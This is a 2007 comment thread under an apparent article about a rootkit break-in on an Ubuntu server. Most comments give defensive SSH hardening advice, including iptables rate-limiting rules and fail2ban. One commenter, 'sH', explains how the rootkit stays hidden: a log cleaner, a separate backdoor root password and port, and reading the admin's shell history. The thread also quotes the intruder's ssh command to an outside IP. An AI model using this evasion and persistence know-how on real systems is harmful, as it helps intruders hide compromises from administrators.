Authored by: Anonymous on Saturday 25 August 2007 @ 06:24 CEST

Of course, you should probably be using public key authentication, primarily, and, as well, you should use strong passwords. I consider a strong password to be more than 10 characters a-zA-Z0-9, personally (this used to be 8-9 characters, but password complexity has to increase with increasing hardware power, although that's not necessarily an issue when talking about brute force over network protocols, which are going to be largely dictionary due to resource constraints other than those of computing hardware itself).

Nevertheless, you've all forgotten one key point: permitting root logins is completely ridiculous, and is the default in many SSH installations. The first thing I do when I set up a new server is to disable SSH, if I'm at the console, and proceed to edit all of that cruft out of the installation: disable SSHv1, disable remote root logins, and so on. I also like to set the login grace time to something relatively low.

Holliday cracking - Authored by: Anonymous on Wednesday 29 August 2007 @ 04:27 CEST

Authored by: Anonymous on Saturday 25 August 2007 @ 10:01 CEST

This is an exceptionally pathetic and old rootkit, and the attacker has zero real skill. I find it kind of amusing your friend couldn't keep his box protected against such an adversary.

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 11:19 CEST

Authored by: Anonymous on Saturday 25 August 2007 @ 11:16 CEST

Thanks for posting this! Some very valuable information here! Good Job.

Raz

Authored by: Anonymous on Saturday 25 August 2007 @ 16:29 CEST

Smells to me as a Brute Force Attack...
amazingly stupid not deleting all the logs

owned by an amateur lammer using a nice hacking tool
Jezzh !!
worst would be that the culprit was a 14 kiddo

...Dun_Mas has spoken

Authored by: Anonymous on Saturday 25 August 2007 @ 22:57 CEST

The denyhost tool has been mentioned. But few seem to know there is a feature built into
iptables that can materially cut down on attacks while allowing you relatively easy access.

===8<---
#China 58.208.0.0 - 58.223.255.255
$IPTABLES -A INPUT -p tcp -m multiport -i $EXTIF -s 58.208.0.0/20 --dports\
22,993,997 -j ssh-drop-and-log-it

...

# Then setup the reject trap
$IPTABLES -A INPUT -p tcp --syn --dport 22 -m recent --name sshattack --set
$IPTABLES -A INPUT -p tcp --dport 22 --syn -m recent --name sshattack \
--rcheck --seconds 180 --hitcount 2 -j LOG --log-prefix 'SSH REJECT: '
$IPTABLES -A INPUT -p tcp --dport 22 --syn -m recent --name sshattack \
--rcheck --seconds 180 --hitcount 2 -j REJECT --reject-with tcp-reset
===8<---

That allows about one try per 3 minutes if you fail. Now, for security I can stand a three mnute
trying to connect to the machine if I am stupid enough to mis-type my own password. But it cuts down on the password guessing by a very high factor, since most attempts I get here run several tries per second. Even guessing a password of abcdefghi would be a rough job at one try every three minutes. And it would stand out in a logwatch report like an absurdly swollen and hammered thumb.

{^_^} jdow

Holliday cracking - Authored by: Anonymous on Sunday 26 August 2007 @ 13:16 CEST

Web applications are a common entry point

Authored by: Anonymous on Monday 27 August 2007 @ 16:18 CEST

Nice report, this surely took you a couple hours.

You seem to be neglecting known vulnerable web applications as a possible entry point. This is one of the most common ways semi automatic (local root exploit is mostly run manually as it's not too easy to handle the various different environments by a script) takeovers work nowadays. As the security status of web applications is often not tracked (nor is it tracked which web applications are installed at all, and this is especially so but not limited to shared hosting environments), it is very difficult for an admin to keep track of their de facto vulnerabilities. Attackers, however, can (and do) easily scan multiple web servers for known security issues and, as the scan takes so little time, do not need to know whether or not a system is vulnerable before starting to run exploits against it.

Moritz Naumann, security[at]moritz-naumann.com

Overview - Authored by: Anonymous on Thursday 20 September 2007 @ 06:03 CEST

Authored by: Anonymous on Monday 27 August 2007 @ 20:05 CEST

Obviously this whole article is a sham.

We all know it's only WIndows systems that get attacked because they're so unsecure. Linux is FAR more secure so they can never get hacked or rooted. This whole thing must have been a crock.

Holliday cracking - Authored by: Anonymous on Tuesday 28 August 2007 @ 06:22 CEST

Holliday cracking - Authored by: Anonymous on Tuesday 28 August 2007 @ 21:45 CEST

Authored by: Anonymous on Tuesday 28 August 2007 @ 09:13 CEST

To limit SSH brute force attack, you can use the easy fail2ban tool, which Ubuntu packaged(http://packages.ubuntu.com/cgi-bin/search_packages.pl?keywords=fail2ban&searchon=names&subword=1&version=all&release=all)
It limits erroneous authentication.

My sshd logs moved from hundreds attempts to very few per day.

Anyway, nice job and thanks for the analyse

Authored by: Anonymous on Tuesday 28 August 2007 @ 22:00 CEST

Great article - well written and documented. Terrific job on the sleuth work which can be applied to any OS after similar break-ins.

Alot of the additional commentary aimed at solutions (prevention, logging activity, downloads, etc) were also well-done by a number of people.

Shame that the method used to enter the system couldn't be finally exposed. Bad password... Firewall setup issues... an insecure PHP forum as a first step in the attack... would be interested in knowing whether this user even had a hardware firewall set up that limited his exposure/presence on the internet.

So much for fairly updated ubuntu...

Authored by: Anonymous on Wednesday 29 August 2007 @ 12:32 CEST

My advice on setting up public systems nowadays includes using OpenVZ or at least Linux-VServer to contain potentially compromised proceses within a sandbox which can be controlled from trusted system only available from a few IPs to a few sysadmins.

It's weird enough that the box was rooted (although running apache-2.0 and probably all sorts of webcrapps on it is really asking for trouble), given that this time it wasn't "outdated breezy due to netcard incompatibility barring upgrade"...

But any of my ALT Linux servers did fail similar way on me only once -- in 2003, the same #1-openbsd-remote-hole in sshd. There was no direct evidence but grave enough feeling of "something's wrong" to rebuild that box from scratch back then.

If anyone's interested, ALT 4.0 Server ISOs are downloadable here:
ftp://ftp.altlinux.org/pub/distributions/ALTLinux/4.0/Server/current/iso
ftp://ftp.linux.kiev.ua/pub/Linux/ALT/4.0/Server/current/iso

It's hardened i586/x86_64 server distro including OpenVZ out-of-box and 3 years of freely available updates; 6000+ SRPMS (11K+ binary packages) available in 4.0/branch.

2 author: re apache vector, it might help to run it with slightly corrected PATH and substituted wget et al which would warn you and error upon intruder as if the binaries weren't found. The approach's not perfect of course, but clinically tested already.

Thanks for the article, nice reading.

--
Michael Shigorin

Authored by: Anonymous on Tuesday 06 November 2007 @ 03:34 CET

Hi evry bdy..

Can i as one doubt... How was the hacker able to play around in /var/..... How can it be possible... Possibly he could have done some thing in /tmp.... and got access to /var area..

Any ideas dudes .... :)

Salinuxam..

Holiday cracking - Authored by: Anonymous on Wednesday 12 December 2007 @ 03:04 CET

Holiday cracking - Authored by: Anonymous on Wednesday 12 December 2007 @ 03:06 CET

Authored by: Anonymous on Wednesday 12 December 2007 @ 03:09 CET

Dear friends,
As it was a gift for holiday called "Holiday Cracking" i would like to say only some words for you 'Lars'
it`s ur right to study the rootkit but don't make false conclusions.
Your questions was:?

1. Forgot to wipe out root's .bash_history. <<<<
>>>Here goes<<< This files was not removed from the root by the rootkit, because you can edit this file
before and after you use the box/root. If you think that this was an error i think for
me NOT. Through this file you can see the admins 'last commands used'. The attacker din`t modificate the file.

2. Wiped out everything under "/var/log/*", including directories which several programs relied on and thereby refusing to start.
Now, why did he do that? This certainly was stupid

The cleaner cleans the last modification and it`s a great tool, you have studied very good this section... Maybe there
was an error from attacker.

3. Changed the root-password. Another bummer. Never ever change the root-password. This surely will catch the attention of a sysadmin.
After installing the rootkit you have your private password and port, so it` does not change
the administrators password. There can be logged two root accounts with different password.

4.Why was the command "ssh ftp@62.101.251.166" entered? Did the attacker made a mistake in typing this command or did it serve some other purpose? The IP addres resolves to:
By typing this command you will be connected to the ip adress (Ftp), there are to many vulnerables
to have all access from the FTP, maybe it`s not wrong/mistake command.

5. And the most important question is, how did he get access in the first time? The server was running Ubuntu 6.06 LTS (i386) and was fairly updated. The compromised could be caused by:
An exploit unknown to the public.
A user accessing this server from an already compromised host. The attacker could then sniff the the password.

This question i will let you to answer yourself, he cannot sniff if he don`t have access to that box so be sure that he did not do that.

greetz,
sH

Holiday cracking - Authored by: Anonymous on Tuesday 13 May 2008 @ 13:51 CEST

Authored by: Anonymous on Wednesday 27 August 2008 @ 12:05 CEST

great site well done

Authored by: Anonymous on Saturday 29 November 2008 @ 01:08 CET

It's possible (maybe even easy) to find out who it is. If I didn't understand it wrong he was connected to the IRC channel a lot. Simply tell the NAT-controller the IPs and ports of the IRC channels, and there's bound to be a (hopefully not more then one) NAT translation entry. Good luck, and good script kiddy hunting.

Holiday cracking

What's Related

Story Options

Trackback

Jump

Topics

Older Stories

Thursday 23-Apr

Wednesday 08-Apr

Tuesday 07-Apr

Sunday 01-Feb

Wednesday 03-Dec

Sunday 26-Oct

Wednesday 05-Mar

Saturday 16-Feb

Friday 15-Feb